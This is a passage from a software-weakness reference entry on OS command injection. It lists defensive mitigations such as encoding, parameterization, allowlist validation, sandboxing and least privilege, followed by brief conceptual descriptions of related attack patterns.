- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
Mitigation MIT-28
Strategy: Output Encoding
While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).
Mitigation
If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.
Mitigation MIT-27
Strategy: Parameterization
- If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
- Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.
- Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.
- Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
Mitigation MIT-21
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-39
- Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
- If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
- Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
- In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used.
Mitigation
Strategy: Sandbox or Jail
Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Mitigation MIT-16
Strategy: Environment Hardening
When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
CAPEC-108: Command Line Execution through SQL Injection
An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
CAPEC-15: Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
CAPEC-43: Exploiting Multiple Input Interpretation Layers
An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
CAPEC-6: Argument Injection
An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
CAPEC-88: OS Command Injection
In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.